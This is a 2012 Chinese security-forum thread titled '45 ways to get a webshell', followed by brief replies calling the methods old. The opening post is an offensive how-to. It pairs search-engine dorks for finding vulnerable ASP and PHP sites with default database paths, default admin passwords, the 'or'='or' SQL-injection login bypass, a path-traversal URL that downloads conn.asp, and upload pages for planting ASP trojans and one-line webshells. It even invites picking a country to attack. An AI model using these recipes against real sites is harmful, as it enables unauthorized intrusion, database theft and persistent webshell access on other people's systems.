查看: 310603|回复: 7

[教程专区] 45拿webshell方法

[复制链接]
  • TA的每日心情
    开心
    2015-9-8 13:06
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-8-24 13:24:21 | 显示全部楼层 |阅读模式
    1,
    到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库!

    2,
    到Google ,site:cq.cn inurl:asp

    3,
    利用挖掘鸡和一个ASP木马.
    文件名是login.asp
    路径组是/manage/
    关键词是went.asp
    用'or'='or'来登陆

    4,
    关键字:Co Net MIB Ver 1.0网站后台管理系统

    帐号密码为 'or'='or'


    5.
    动感购物系统
    inurl:help.asp登陆,如未注册成为会员!

    upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞


    6。
    默认数据库地址blogdata/acblog.asa
    关键字:acblog

    7.
    百度 /htdocs
    注册里可以直接上传asa文件!


    8.
    /Database/#newasp.mdb
    关键词:NewAsp SiteManageSystem Version


    9.
    用挖掘机         
    关键字:Powered by WEBBOY
    页面:/upfile.asp

    10.
    baidu中搜索关键字Ver5.0 Build 0519
    (存在上传漏洞)

    11.
    Upfile_Article.asp bbs/upfile.asp
    输入关键字:powered by mypower ,

    12.
    inurl:winnt\system32\inetsrv\ 在google里面输入这个就可以找到很多网站

    13.
    现在GOOGLE搜索关键字   intitle:网站小助手 inurl:asp

    14.
    键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛

    挖掘鸡的关键字 添 setup.asp


    15.
    VBulletin论坛的数据库
    默认数据库地址!
    /includes/functions.php
    工具:
    1.网站猎手 下载地址:百度 Google!
    2.Google
    关键字:
    Powered by: vBulletin Version 3.0.1
    Powered by: vBulletin Version 3.0.2
    Powered by: vBulletin Version 3.0.3
    其中一个就可以了

    16.
    1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
    open source。 这是一个商场系统。
    2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
    猜到,comersus.mdb. 是数据库名
    数据库都是放在database/ 后的,
    所以database/comersus.mdb
    comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
    那样把前一个''store/''除去,再加上database/comersus.mdb 试试

    17.
    无忧传奇官方站点程序。
        1、后台管理地址:http://您的域名/msmiradmin/
        2、默认后台管理帐号:msmir
        3、默认后台管理密码:msmirmsmir
    数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
    数据库连接文件为 ***********/Conn.asp

    18.
    百度里输入/skins/default/

    19.
    利用挖掘机
    关键机:power by Discuz
    路径:/wish.php
    配合:
    Discuz!论坛 wish.php远程包含漏洞 工具使用

    20.
    上传漏洞.
    工具 : Domain3.5
        网站猎手 1.5版
    关键字powered by mypower
    检测的页面或文件插入upfile_photo.asp


    21.
    新云漏洞
    这个漏洞ACCESS和SQL版通吃。
    Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
    把flash/downfile.asp?url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
    以源码,软件等下载站居多。
    大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
    \database\%23newasp.mdb
    如:#xzws.mdb 改成%23xzws.mdb

    22.
    通吃所有商城+动力上传系统

    使用工具:挖掘鸡 v1.1 明小子
    商城入侵:
    关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
    漏洞页面:upload.asp
        upfile_flash.asp

    动力入侵:
    关键字:powered by mypower
    漏洞页面:upfile_photo.asp
        Upfile_Soft.asp
        upfile_adpic.asp
        upfile_softpic.asp

    23.
    注射漏洞
    百度搜索ioj's blog

    24
    动易
    列目录
    admin_articlerecyclebin.asp
    inurl:admin_articlerecyclebin.asp

    25.
    工具:网站猎手
    关键词:inurl:Went.asp
    后缀:manage/login.asp
    口令:'or'='or'

    26.
    入侵魔兽私服
    需要的工具:ASP木马一只。
            Domain3.5明小子
    关键字:All Right Reserved Design:游戏联盟
    后台地址:admin/login.asp
    数据库的地址:chngame/#chngame.mdb

    27.
    漏洞是利用管理员iis设置的失误
    用baidu 关键字就是比较罕见的脚本名
    动网: ReloadForumCache.asp
    Leadbbs: makealltopanc.asp
    BBSXP: admin_fso.asp
    动易: admin_articlerecyclebin.asp

    28.
    国外站的爆库漏洞
    关键字:sad Raven's Guestbook
    密码地址:/passwd.dat
    后台地址:/admin.php

    29.
    Discuz 4.1.0跨站漏洞
    利用工具:1,WAP浏览器
        2,WAP编码转换器
    关键字:"intextiscuz! 4.1.0"

    30.
    关键字:尚奈克斯
    后台路径/system/manage.asp
    直接传ASP木马

    31.
    工具
    1:网站猎手
    2:大马一个
    关键字:切勿关闭Cookies功能,否则您将不能登录
    插入diy.asp

    32.
    关键字:Team5 Studio All rights reserved
    默认数据库:data/team.mdb

    33.
    工具:   挖掘机 辅臣数据库读取器
    关键字: 企业简介 产品展示 产品列表
    后缀添加: /database/myszw.mdb
    后台地址: admin/Login.asp

    34.
    关键子 XXX inurl:Nclass.asp
    在"系统设置"里写个木马。
    会被保存到 在 config.asp内。

    35.
    不进后台照样拿动网WEBSHELL
    data.asp?action=BackupData     动网数据库备份默认路径

    36.
    工具:网站猎手 WebShell
    关键字:inurl:Went.asp
    后缀:manage/login.asp
    弱口令:'or'='or'

    37.
    关键字owered byCDN_NEWS
    随便扫遍文章加一个' ,来试探注入点
    后台地址:admin_index.asp

    38.
    入侵雷池新闻发布系统
    关键字:leichinews
    去掉leichinews后面的.
    打上:admin/uploadPic.asp?actionType=mod&picName=xuanran.asp
    再上传马.....
    进访问uppic anran.asp 登陆马.

    39.
    关键字ower System Of Article Management Ver 3.0 Build 20030628
    默认数据库:database\yiuwekdsodksldfslwifds.mdb
    后台地址:自己扫描!

    40.
    一、通过GOOGLE搜索找大量注入点
    关键字:asp?id=1   gov.jp/ asp?id=
    页数:100
    语言:想入侵哪个国家就填什么语言吧

    41.
    关键字:Powered by:94KKBBS 2005
    利用密码找回功能 找回admin
    提问:ddddd 回答:ddddd

    42.
    关键字:inurl:Went.asp
    后台为manage/login.asp
    后台密码: 'or'='or' 或者 'or''=''or' 登录 进入
    默认数据库地址atabase/DataShop.mdb

    43.
    关键字:****** inurl:readnews.asp
    把最后一个/改成%5c ,直接暴库,看密码,进后台
    随便添加个新闻 在标题输入我们的一句话木马

    44.
    工具:一句话木马
      BBsXp 5.0 sp1 管理员猜解器
    关键词:powered by bbsxp5.00
    进后台,备份一句话马!

    45.
    关键字:程序核心:BJXSHOP网上开店专家
    后台:/admin
    回复

    使用道具 举报

    flycain 该用户已被删除
    发表于 2012-8-24 20:02:57 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    头像被屏蔽

    该用户从未签到

    发表于 2012-8-25 20:27:39 | 显示全部楼层
    提示: 作者被禁止或删除 内容自动屏蔽
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-11 12:26:32 | 显示全部楼层
    都是一些万人齐哈
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-5-2 10:50:18 | 显示全部楼层
    支持  
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-6-29 20:33:08 | 显示全部楼层
    都是过时已久的了
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-10-23 22:57:18 | 显示全部楼层
    45拿webshell方法 还能用吗?
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2015-12-4 00:34
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2014-10-23 23:15:08 | 显示全部楼层
    这个屌                 
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-4-27 07:44 , Processed in 0.031605 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部